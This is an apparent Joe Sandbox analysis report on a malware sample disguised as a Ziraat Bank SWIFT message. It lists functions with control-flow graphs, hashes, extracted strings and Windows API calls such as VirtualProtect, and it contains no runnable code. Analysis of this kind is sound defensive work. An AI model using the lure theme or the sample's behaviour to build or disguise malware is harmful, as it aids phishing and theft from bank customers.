                                                                          • Opcode ID: b69728be052fda87fd68de9a03d96731168fe208fe2ad53c1c11bc283933ddd5
                                                                          • Instruction ID: 8a18521158e40edc5a6acd073e9a4077b0e63654aabc525b5f1b3671cd521050
                                                                          • Opcode Fuzzy Hash: b69728be052fda87fd68de9a03d96731168fe208fe2ad53c1c11bc283933ddd5
                                                                          • Instruction Fuzzy Hash: 37A1F374E00219CFDB48DFAAC984A9EFBB2EF89300F24942AD515AB254D7349941CFA4
                                                                          Function 06940B90 Relevance: 4.0, Strings: 3, Instructions: 219COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 607 6940b90-6940bb3 608 6940bb5 607->608 609 6940bba-6940c14 607->609 608->609 612 6940c17 609->612 613 6940c1e-6940c3a 612->613 614 6940c43-6940c44 613->614 615 6940c3c 613->615 616 6940df0-6940e60 614->616 615->612 615->614 615->616 617 6940d93-6940dae 615->617 618 6940c73-6940c85 615->618 619 6940db3-6940dca 615->619 620 6940cdc-6940d06 615->620 621 6940d46-6940d5b 615->621 622 6940c87-6940ca7 615->622 623 6940d60-6940d6d 615->623 624 6940cac-6940cb0 615->624 625 6940dcf-6940deb 615->625 626 6940c49-6940c71 615->626 627 6940d0b-6940d41 615->627 643 6940e62 call 6942766 616->643 644 6940e62 call 6942b37 616->644 645 6940e62 call 6942ae8 616->645 646 6940e62 call 6941e7a 616->646 647 6940e62 call 694214b 616->647 617->613 618->613 619->613 620->613 621->613 622->613 638 6940d76-6940d8e 623->638 628 6940cb2-6940cc1 624->628 629 6940cc3-6940cca 624->629 625->613 626->613 627->613 633 6940cd1-6940cd7 628->633 629->633 633->613 638->613 642 6940e68-6940e72 643->642 644->642 645->642 646->642 647->642
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2098471680.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6940000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Te]q$Te]q$z^I
                                                                          • API String ID: 0-3923789156
                                                                          • Opcode ID: 0f5c23db2d3830dffbe5bd9f6ff3e24555ce8c2cb1b28c38c5cb1a6b39b9f28c
                                                                          • Instruction ID: ecc1b42b82548329d58295b0def4c1e5c17f8a74461e6e2c0cff3295a9efe6bf
                                                                          • Opcode Fuzzy Hash: 0f5c23db2d3830dffbe5bd9f6ff3e24555ce8c2cb1b28c38c5cb1a6b39b9f28c
                                                                          • Instruction Fuzzy Hash: 1E91C2B4E00219CFDB48DFAAC5849AEFBB2FF88300F24942AD515BB264D7349945CF64
                                                                          Function 069496C8 Relevance: 2.7, Strings: 2, Instructions: 224COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 731 69496c8-69496ed 732 69496f4-6949725 731->732 733 69496ef 731->733 734 6949726 732->734 733->732 735 694972d-6949749 734->735 736 6949752-6949753 735->736 737 694974b 735->737 746 69499bf-69499c8 736->746 748 6949758-694979a 736->748 737->734 738 69497b4-69497db 737->738 739 69497f7-69497fd call 6949b08 737->739 740 6949972-6949984 737->740 741 69498d3-69498fa 737->741 742 6949893-69498a6 737->742 743 694985c-6949860 737->743 744 694979c-69497af 737->744 745 694993e-6949956 737->745 737->746 747 69498ff-6949912 737->747 737->748 749 694995b-694996d 737->749 750 6949844-6949857 737->750 751 69498c5-69498ce 737->751 752 69499a5-69499ba 737->752 753 69497e0-69497f2 737->753 754 6949828-694983f 737->754 755 6949989-69499a0 737->755 756 69498ab-69498c0 737->756 738->735 766 6949803-6949823 739->766 740->735 741->735 742->735 757 6949862-6949871 743->757 758 6949873-694987a 743->758 744->735 745->735 759 6949914-6949923 747->759 760 6949925-694992c 747->760 748->735 749->735 750->735 751->735 752->735 753->735 754->735 755->735 756->735 762 6949881-694988e 757->762 758->762 761 6949933-6949939 759->761 760->761 761->735 762->735 766->735
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2098471680.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6940000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: TuA$UC;"
                                                                          • API String ID: 0-2071649361
                                                                          • Opcode ID: 57ff8bfbb6bf20a086304c63e008865c74d32c06127d7bc8441fc62982ad4e8d
                                                                          • Instruction ID: f7253d1277d839aed45d3b56e10a4fe0c481a73fd7ce007bfc487683e38bbe7e
                                                                          • Opcode Fuzzy Hash: 57ff8bfbb6bf20a086304c63e008865c74d32c06127d7bc8441fc62982ad4e8d
                                                                          • Instruction Fuzzy Hash: D99137B4D15209EFDB48CFA6E58099EFBB2FF89350F10E42AE515AB264D7349902CF40
                                                                          Function 069496B8 Relevance: 2.7, Strings: 2, Instructions: 223COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 769 69496b8-69496ed 771 69496f4-6949725 769->771 772 69496ef 769->772 773 6949726 771->773 772->771 774 694972d-6949749 773->774 775 6949752-6949753 774->775 776 694974b 774->776 785 69499bf-69499c8 775->785 787 6949758-694979a 775->787 776->773 777 69497b4-69497db 776->777 778 69497f7-69497fd call 6949b08 776->778 779 6949972-6949984 776->779 780 69498d3-69498fa 776->780 781 6949893-69498a6 776->781 782 694985c-6949860 776->782 783 694979c-69497af 776->783 784 694993e-6949956 776->784 776->785 786 69498ff-6949912 776->786 776->787 788 694995b-694996d 776->788 789 6949844-6949857 776->789 790 69498c5-69498ce 776->790 791 69499a5-69499ba 776->791 792 69497e0-69497f2 776->792 793 6949828-694983f 776->793 794 6949989-69499a0 776->794 795 69498ab-69498c0 776->795 777->774 805 6949803-6949823 778->805 779->774 780->774 781->774 796 6949862-6949871 782->796 797 6949873-694987a 782->797 783->774 784->774 798 6949914-6949923 786->798 799 6949925-694992c 786->799 787->774 788->774 789->774 790->774 791->774 792->774 793->774 794->774 795->774 801 6949881-694988e 796->801 797->801 800 6949933-6949939 798->800 799->800 800->774 801->774 805->774
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2098471680.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6940000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: TuA$UC;"
                                                                          • API String ID: 0-2071649361
                                                                          • Opcode ID: 15ac534666599f5f8ff1bc267645da7698cc3e47ab0a74192a8733e87a87ceec
                                                                          • Instruction ID: b4a852f0841cf17e1be9dcc65240462503cb0e62e399ea164cfaab311b134196
                                                                          • Opcode Fuzzy Hash: 15ac534666599f5f8ff1bc267645da7698cc3e47ab0a74192a8733e87a87ceec
                                                                          • Instruction Fuzzy Hash: DA913874D15209EFDB48CFAAE58099EFBB2FF89350F20E42AE515A7264D7349941CF40
                                                                          Function 0694A560 Relevance: 1.6, Strings: 1, Instructions: 355COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 908 694a560-694a577 909 694a504-694a507 908->909 910 694a579-694a595 908->910 914 694a510-694a52b 909->914 911 694a597 910->911 912 694a59c-694a5f5 910->912 911->912 913 694a5f6 912->913 915 694a5fd-694a619 913->915 916 694a4dc-694a4f8 914->916 919 694a622-694a623 915->919 920 694a61b 915->920 917 694a501-694a502 916->917 918 694a4fa 916->918 917->909 922 694a541-694a547 917->922 918->909 921 694a4d5 918->921 918->922 923 694a52d-694a53f 918->923 940 694a9b9-694a9c2 919->940 920->913 920->919 924 694a757-694a77b 920->924 925 694a6d0-694a6f4 920->925 926 694a7d0-694a7e7 920->926 927 694a99d-694a9b4 920->927 928 694a65f-694a688 920->928 929 694a958-694a961 920->929 930 694a780-694a79c 920->930 931 694a840-694a87d call 69488c8 920->931 932 694a882-694a897 920->932 933 694a68d-694a6b1 920->933 934 694a8ca-694a8dd 920->934 935 694a64a-694a65d 920->935 936 694a6b6-694a6cb 920->936 937 694a63c-694a648 920->937 938 694a8bc-694a8c5 920->938 939 694a7b8-694a7cb 920->939 920->940 941 694a6f9-694a702 920->941 942 694a8fa-694a925 920->942 943 694a966-694a96a 920->943 944 694a7a1-694a7b3 920->944 945 694a8e2-694a8f5 920->945 946 694a823-694a83b 920->946 947 694a7ec-694a7f0 920->947 948 694a628-694a63a 920->948 949 694a728-694a731 920->949 921->916 923->916 924->915 925->915 926->915 927->915 928->915 929->915 930->915 931->915 956 694a89e-694a8b7 932->956 957 694a899 932->957 933->915 934->915 935->915 936->915 937->915 938->915 939->915 950 694a704 941->950 951 694a709-694a723 941->951 969 694a927 942->969 970 694a92c-694a953 942->970 958 694a96c-694a97b 943->958 959 694a97d-694a984 943->959 944->915 945->915 946->915 954 694a7f2-694a801 947->954 955 694a803-694a80a 947->955 948->915 952 694a733 949->952 953 694a738-694a752 949->953 950->951 951->915 952->953 953->915 960 694a811-694a81e 954->960 955->960 956->915 957->956 965 694a98b-694a998 958->965 959->965 960->915 965->915 969->970 970->915
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2098471680.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6940000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: {#L
                                                                          • API String ID: 0-1361971085
                                                                          • Opcode ID: 6a200bc45c9d5fbad8b257a46490576a58bc034db0593c3dca199df030d8c492
                                                                          • Instruction ID: f6a28911e96abd3fe6a9af8f9c8564c7784bcdcbbba22afa17d5ca9d538700b3
                                                                          • Opcode Fuzzy Hash: 6a200bc45c9d5fbad8b257a46490576a58bc034db0593c3dca199df030d8c492
                                                                          • Instruction Fuzzy Hash: F8E10475E05209DFDB58CFAAD68099EFBF2BB88300F14D52AD419EB228D7309942CF54
                                                                          Function 06948090 Relevance: 1.4, Strings: 1, Instructions: 178COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2098471680.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6940000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 5=6
                                                                          • API String ID: 0-2897083178
                                                                          • Opcode ID: 3bb33b552bb4e294eca6b56f3851639cc5a43bc58f700efb33fedf90dcfeeb3c
                                                                          • Instruction ID: 4d1498e3e2ad5618f3e8ed048776e03347ecbb9ff3b31d8a498aec18b57d0f03
                                                                          • Opcode Fuzzy Hash: 3bb33b552bb4e294eca6b56f3851639cc5a43bc58f700efb33fedf90dcfeeb3c
                                                                          • Instruction Fuzzy Hash: 12715874E1520ADFCB44DFA6D9449AEFBF2FF89200F00E86AD416E7614D7389A018F94
                                                                          Function 069480A0 Relevance: 1.4, Strings: 1, Instructions: 176COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2098471680.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6940000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 5=6
                                                                          • API String ID: 0-2897083178
                                                                          • Opcode ID: 29b03c743a7751d89f034ce1bd50c6eb2144d0539cccdcd2bb14fa51cff82310
                                                                          • Instruction ID: 3571c0f8dc5c7c461d9cba73fb7fd4e72702ca17bd373da038ac53158d8ced89
                                                                          • Opcode Fuzzy Hash: 29b03c743a7751d89f034ce1bd50c6eb2144d0539cccdcd2bb14fa51cff82310
                                                                          • Instruction Fuzzy Hash: A2614774E1520ADFCB44DFA6D9448AEFBF2FF89200B10E86AD416E7614D7389A018F94
                                                                          Function 04C56DC0 Relevance: .8, Instructions: 839COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2097481342.0000000004C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4c50000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1abcc906305428f23efcd24e6194d279ea7ff766e69a8350da09311616311e75
                                                                          • Instruction ID: 96f692ccbd933b1d6f6cf00dd807c0ae0faf36228f8de09cd833a01fc65d62b9
                                                                          • Opcode Fuzzy Hash: 1abcc906305428f23efcd24e6194d279ea7ff766e69a8350da09311616311e75
                                                                          • Instruction Fuzzy Hash: E892E534A00619CFDB55DF68C894AD9B7B2FF89300F5186EAD8096B360DB31AE85CF50
                                                                          Function 04C56DB2 Relevance: .8, Instructions: 834COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2097481342.0000000004C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4c50000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 563eca034e6f66b2fa3dc8ece7afa9cea2edb2331a87e5a91341e0b67dcf6b61
                                                                          • Instruction ID: 149d63b5f5ee5daf4d354da8f7ee78a299b116de77c88531514c763468d3608d
                                                                          • Opcode Fuzzy Hash: 563eca034e6f66b2fa3dc8ece7afa9cea2edb2331a87e5a91341e0b67dcf6b61
                                                                          • Instruction Fuzzy Hash: E992E434A01659CFD755DF68C894AD9B7B2FF89300F5186EAD8096B360DB31AE85CF40
                                                                          Function 06941E7A Relevance: .1, Instructions: 73COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2098471680.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6940000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 77550c59981e17dbd15072956f0b1c13519284bd59bbaf9a2320a11eb4fe6c62
                                                                          • Instruction ID: e57a6d60d68f191474532e3d32edc696ad90a1b44bdb7a28347895cf2dbeb107
                                                                          • Opcode Fuzzy Hash: 77550c59981e17dbd15072956f0b1c13519284bd59bbaf9a2320a11eb4fe6c62
                                                                          • Instruction Fuzzy Hash: C62106B1E006188BDB58CFAAD9447DEBBB7BFC8310F14C06AD509A6268DB355A46CF50
                                                                          Function 0694E620 Relevance: .1, Instructions: 56COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2098471680.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6940000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8181212ce8e5932334f155f26234b1ca5e40aa3db358062803f9bf5ca542eb2d
                                                                          • Instruction ID: de0e8b79a13e5b656e807a21c8c017dad83dffaa0360a81bb6ddff5855187f1c
                                                                          • Opcode Fuzzy Hash: 8181212ce8e5932334f155f26234b1ca5e40aa3db358062803f9bf5ca542eb2d
                                                                          • Instruction Fuzzy Hash: 7D21B0B1D006188BEB58DFABD9457DEFAF6BFC8300F14C56AD4086A264DB7509468FA0
                                                                          Function 024CAE48 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 851 24cae48-24cae57 852 24cae59-24cae66 call 24ca1a0 851->852 853 24cae83-24cae87 851->853 860 24cae7c 852->860 861 24cae68 852->861 855 24cae89-24cae93 853->855 856 24cae9b-24caedc 853->856 855->856 862 24caede-24caee6 856->862 863 24caee9-24caef7 856->863 860->853 906 24cae6e call 24cb0e0 861->906 907 24cae6e call 24cb0d1 861->907 862->863 864 24caef9-24caefe 863->864 865 24caf1b-24caf1d 863->865 867 24caf09 864->867 868 24caf00-24caf07 call 24ca1ac 864->868 870 24caf20-24caf27 865->870 866 24cae74-24cae76 866->860 869 24cafb8-24cb078 866->869 874 24caf0b-24caf19 867->874 868->874 901 24cb07a-24cb07d 869->901 902 24cb080-24cb0ab GetModuleHandleW 869->902 871 24caf29-24caf31 870->871 872 24caf34-24caf3b 870->872 871->872 875 24caf3d-24caf45 872->875 876 24caf48-24caf51 call 24ca1bc 872->876 874->870 875->876 882 24caf5e-24caf63 876->882 883 24caf53-24caf5b 876->883 884 24caf65-24caf6c 882->884 885 24caf81-24caf8e 882->885 883->882 884->885 887 24caf6e-24caf7e call 24ca1cc call 24ca1dc 884->887 891 24caf90-24cafae 885->891 892 24cafb1-24cafb7 885->892 887->885 891->892 901->902 903 24cb0ad-24cb0b3 902->903 904 24cb0b4-24cb0c8 902->904 903->904 906->866 907->866
                                                                          APIs
                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 024CB09E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2095319907.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_24c0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          • Opcode ID: 4f278bdc65853d8c96b94089aa31499e6e99c513f3c490d72bbb85d863ee7073
                                                                          • Instruction ID: 39dff22a66a6fdfc8785367d9d62194bef6f77351e63a9de3707d1bf4a4b4b8e
                                                                          • Opcode Fuzzy Hash: 4f278bdc65853d8c96b94089aa31499e6e99c513f3c490d72bbb85d863ee7073
                                                                          • Instruction Fuzzy Hash: 2D7112B4A00B198FD764DF2AD05475ABBF2BF88304F10892ED48A97B40D735E949CF91
                                                                          Function 024C44B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 971 24c44b0-24c59d9 CreateActCtxA 974 24c59db-24c59e1 971->974 975 24c59e2-24c5a3c 971->975 974->975 982 24c5a3e-24c5a41 975->982 983 24c5a4b-24c5a4f 975->983 982->983 984 24c5a60 983->984 985 24c5a51-24c5a5d 983->985 987 24c5a61 984->987 985->984 987->987
                                                                          APIs
                                                                          • CreateActCtxA.KERNEL32(?), ref: 024C59C9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2095319907.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_24c0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID: Create
                                                                          • String ID:
                                                                          • API String ID: 2289755597-0
                                                                          • Opcode ID: 0a36c20928559b5271f312ec4b929b2de27e920028da91fa25b7f297febea3fa
                                                                          • Instruction ID: cfb6f66c04db18179c471d8e333a768d1e2d8007bc169355b1c28e5a90da8738
                                                                          • Opcode Fuzzy Hash: 0a36c20928559b5271f312ec4b929b2de27e920028da91fa25b7f297febea3fa
                                                                          • Instruction Fuzzy Hash: 2E41D2B4C0061DCBDB24DFAAC844BDEBBB5BF49304F60809AD409BB251DB75A949CF90
                                                                          Function 024C590D Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateActCtxA.KERNEL32(?), ref: 024C59C9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2095319907.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_24c0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID: Create
                                                                          • String ID:
                                                                          • API String ID: 2289755597-0
                                                                          • Opcode ID: a91c8a248a5c16e0d70ecf521e90c0ef568e5618779b9a51dd3d6a6aed0f0b30
                                                                          • Instruction ID: 745a83df30eeca48afdabf042f21913a55afdb49ce50a781832d7d9dce702c79
                                                                          • Opcode Fuzzy Hash: a91c8a248a5c16e0d70ecf521e90c0ef568e5618779b9a51dd3d6a6aed0f0b30
                                                                          • Instruction Fuzzy Hash: 2B41D2B0C00619CBDB24DFAAC8847CDFBB1BF49304F60809AD409BB251DB756949CF90
                                                                          Function 04C54050 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 04C54111
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2097481342.0000000004C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4c50000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID: CallProcWindow
                                                                          • String ID:
                                                                          • API String ID: 2714655100-0
                                                                          • Opcode ID: 5f7be6a89baf4310be1c64da38005d0217638b8917d3a2e4312d1f52bb3d484f
                                                                          • Instruction ID: 853ed08357eb7f288c9a0e25005a6f2a2477b76c469d2b69a47e18ae4732a633
                                                                          • Opcode Fuzzy Hash: 5f7be6a89baf4310be1c64da38005d0217638b8917d3a2e4312d1f52bb3d484f
                                                                          • Instruction Fuzzy Hash: 17412AB99002099FDB14DF89C448A9EBBF6FB88314F24C499D419A7321D374A981CFA4
                                                                          Function 024CB830 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,024CD6E6,?,?,?,?,?), ref: 024CD7A7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2095319907.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_24c0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          • Opcode ID: 3521855d18985eee9e8564a173f8abf234f8613a741bcd0518b8bbdcfb872aa4
                                                                          • Instruction ID: 78bb7f937df4e405e7d04d4ddf309828eda82d3ccec95f70135803cdd0293d73
                                                                          • Opcode Fuzzy Hash: 3521855d18985eee9e8564a173f8abf234f8613a741bcd0518b8bbdcfb872aa4
                                                                          • Instruction Fuzzy Hash: FF21F2B5900208EFDB10CF9AD584AEEBFF4EB48310F10806AE918A3310D374A950CFA0
                                                                          Function 024CD719 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,024CD6E6,?,?,?,?,?), ref: 024CD7A7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2095319907.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_24c0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          • Opcode ID: d0922ea034c5b50df3077320def3a0a7abe897c995d8bd14f3fdad1788c23759
                                                                          • Instruction ID: f8806ec1c912d03a0d13157f0d2049a612ea81a26551419ed9859bd1434d72c6
                                                                          • Opcode Fuzzy Hash: d0922ea034c5b50df3077320def3a0a7abe897c995d8bd14f3fdad1788c23759
                                                                          • Instruction Fuzzy Hash: 5221E3B5900209DFDB10CF99D584ADEBBF5EB48314F24806AE958B7350D374A954CFA4
                                                                          Function 06947CB8 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06947D33
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2098471680.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6940000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 15f37d96b85c19dee0a0a6fa861f46b1de01229363c664a862d9a2deb6ea0e03
                                                                          • Instruction ID: d7ce0399638ff795fe43b52b14bf45cf4492d06c42121a9aee10d7e191458a72
                                                                          • Opcode Fuzzy Hash: 15f37d96b85c19dee0a0a6fa861f46b1de01229363c664a862d9a2deb6ea0e03
                                                                          • Instruction Fuzzy Hash: 702106B59002499FCB20DF9AC884ADEFBF4FF48320F10842AE859A7650D374A644CFA1
                                                                          Function 06947CC0 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06947D33
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2098471680.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6940000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 364b53b23a968bbd4cc2b6c83992bbc5ec601adb1c77a3e0035bb006f3e5d48b
                                                                          • Instruction ID: 3fd83e6ed26f3112f79a3a8882957d6544395a99d5d85e5b9da87d4f5a7124f2
                                                                          • Opcode Fuzzy Hash: 364b53b23a968bbd4cc2b6c83992bbc5ec601adb1c77a3e0035bb006f3e5d48b
                                                                          • Instruction Fuzzy Hash: B121E4B59002499FCB10DF9AD884BDEFBF4FB48320F10842AE959A7650D378A644CFA1
                                                                          Function 024CB038 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 024CB09E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2095319907.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_24c0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          • Opcode ID: 84a179db423c3f1e0d45a5a9a1d1998b960bd4bc578dcf57bd7d79074d895ef7
                                                                          • Instruction ID: 1bd8768810e1f6fc6fc50e29cb7d48cde3d8b95cd74b67c22166c7f5006ab97f
                                                                          • Opcode Fuzzy Hash: 84a179db423c3f1e0d45a5a9a1d1998b960bd4bc578dcf57bd7d79074d895ef7
                                                                          • Instruction Fuzzy Hash: 6211D2B5C006498FDB10DF9AD444ADEFBF4EB88324F10845AD469A7610D375A545CFA1
                                                                          Function 0246D4C4 Relevance: .1, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2095104891.000000000246D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0246D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_246d000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ef9ff737cc19db7f30cd583bf86fa8d4e5bdbd54669593652e7a04dee2d611a0
                                                                          • Instruction ID: 7c2c7451d13afde8005406ae9561440dfa2c0138dbf12a13b36fe3f0c486c8be
                                                                          • Opcode Fuzzy Hash: ef9ff737cc19db7f30cd583bf86fa8d4e5bdbd54669593652e7a04dee2d611a0
                                                                          • Instruction Fuzzy Hash: 0021D3B1A04240DFDB15DF14D9C8B37BF65FB88318F24C56AE9090B656C336D856CAA2
                                                                          Function 0247D1D4 Relevance: .1, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2095151117.000000000247D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0247D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
